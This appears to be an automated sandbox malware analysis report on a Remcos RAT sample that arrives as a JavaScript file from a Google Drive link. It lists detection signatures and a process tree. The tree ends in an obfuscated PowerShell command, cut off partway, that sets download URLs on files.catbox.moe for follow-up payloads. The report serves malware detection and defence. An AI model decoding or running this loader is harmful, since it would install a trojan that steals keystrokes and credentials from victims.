Windows
Analysis Report
https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Malicious sample detected (through community Yara rule)
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64_ra
chrome.exe (PID: 6288 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) chrome.exe (PID: 6476 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2096 --fi eld-trial- handle=190 8,i,125383 7346360895 755,759848 1628493044 316,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
chrome.exe (PID: 7156 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://drive .google.co m/file/d/1 FVDnmU54G6 _GaADSmojq RgpCVK0Y1U 9s/view?us p=sharing" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) conhost.exe (PID: 4284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
rundll32.exe (PID: 7588 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
7zG.exe (PID: 7800 cmdline:
"C:\Progra m Files\7- Zip\7zG.ex e" x -o"C: \Users\use r\Download s\F-2025-0 855\" -spe -an -ai#7 zMap30307: 86:7zEvent 17416 MD5: 50F289DF0C19484E970849AAC4E6F977)
wscript.exe (PID: 8136 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D ownloads\F -2025-0855 \F-2025-08 55.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 1324 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ WgkXZ = 'J A' + [char ]66 + 'MAF QAaw' + [c har]66 + ' aAFoAIAA9A CAAJA' + [ char]66 + 'oAG8Acw' + [char]66 + '0AC4AV g' + [char ]66 + 'lAH IAcw' + [c har]66 + ' pAG8AbgAuA E0AYQ' + [ char]66 + 'qAG8AcgAu AEUAcQ' + [char]66 + '1AGEAbA' + [char]6 6 + 'zACgA MgApADsASQ ' + [char] 66 + 'mACA AKAAgACQAT A' + [char ]66 + 'UAG sAWg' + [c har]66 + ' aACAAKQAgA HsAJA' + [ char]66 + 'mAGIASw' + [char]66 + 'OAFkAI AA9ACAAKA' + [char]6 6 + 'bAFMA eQ' + [cha r]66 + 'zA HQAZQ' + [ char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AU A' + [char ]66 + 'hAH QAaA' + [c har]66 + ' dADoAOg' + [char]66 + 'HAGUAdA ' + [char] 66 + 'UAGU AbQ' + [ch ar]66 + 'w AFAAYQ' + [char]66 + '0AGgAKAA pACkAOw' + [char]66 + 'kAGUAbA AgACgAJA' + [char]66 + 'mAGIAS w' + [char ]66 + 'OAF kAIAArACAA Jw' + [cha r]66 + 'cA FUAcA' + [ char]66 + '3AGkAbgAu AG0Acw' + [char]66 + '1ACcAKQA 7ACQAbg' + [char]66 + 'nAHMAZA ' + [char] 66 + 'wACA APQAgACcAa A' + [char ]66 + '0AH QAcA' + [c har]66 + ' zADoALwAvA GYAaQ' + [ char]66 + 'sAGUAcwAu AGMAYQ' + [char]66 + '0AGIAbw' + [char]6 6 + '4AC4A bQ' + [cha r]66 + 'vA GUALw' + [ char]66 + 'zAGEAaw' + [char]66 + '1AHUAb wAuAG0Acw' + [char]6 6 + '1ACcA OwAkAG0AZQ ' + [char] 66 + 'uAG8 AcwAgAD0AI AAnAGgAdA' + [char]6 6 + '0AHAA cwA6AC8ALw ' + [char] 66 + 'mAGk AbA' + [ch ar]66 + 'l AHMALg' + [char]66 + 'jAGEAdA' + [char]6 6 + 'iAG8A eAAuAG0Abw ' + [char] 66 + 'lAC8 ANg' + [ch ar]66 + 'z AGQAag' + [char]66 + 'jADUALg' + [char]6 6 + 'tAHMA dQAnADsAJA ' + [char] 66 + 'FAGg AZw' + [ch ar]66 + 'W AHcAIAA9AC AAJA' + [c har]66 + ' lAG4AdgA6A FAAUg' + [ char]66 + 'PAEMARQ' + [char]66 + 'TAFMAT w' + [char ]66 + 'SAF 8AQQ' + [c har]66 + ' SAEMASA' + [char]66 + 'JAFQARQ ' + [char] 66 + 'DAFQ AVQ' + [ch ar]66 + 'S AEUALg' + [char]66 + 'DAG8Abg' + [char]6 6 + '0AGEA aQ' + [cha r]66 + 'uA HMAKAAnADY ANAAnACkAO w' + [char ]66 + 'pAG YAIAAoACAA JA' + [cha r]66 + 'FA GgAZw' + [ char]66 + 'WAHcAIAAp ACAAewAkAG 4AZw' + [c har]66 + ' zAGQAcAAgA D0AIAAkAG0 AZQ' + [ch ar]66 + 'u AG8AcwAgAD sAfQ' + [c har]66 + ' lAGwAcw' + [char]66 + 'lACAAew AkAG4AZw' + [char]66 + 'zAGQAc AAgAD0AIAA oACQAbg' + [char]66 + 'nAHMAZA ' + [char] 66 + 'wACk AIAA7AH0AO wAkAHkAaw' + [char]6 6 + 'oAHkA bgAgAD0AIA AoACAATg' + [char]66 + 'lAHcAL Q' + [char ]66 + 'PAG IAag' + [c har]66 + ' lAGMAdAAgA E4AZQ' + [ char]66 + '0AC4AVw' + [char]66 + 'lAGIAQ w' + [char ]66 + 'sAG kAZQ' + [c har]66 + ' uAHQAIAApA CAAOwAkAHk Aaw' + [ch ar]66 + 'o AHkAbgAuAE UAbg' + [c har]66 + ' jAG8AZA' + [char]66 + 'pAG4AZw AgAD0AIA' + [char]66 + 'bAFMAe Q' + [char ]66 + 'zAH QAZQ' + [c har]66 + ' tAC4AVA' + [char]66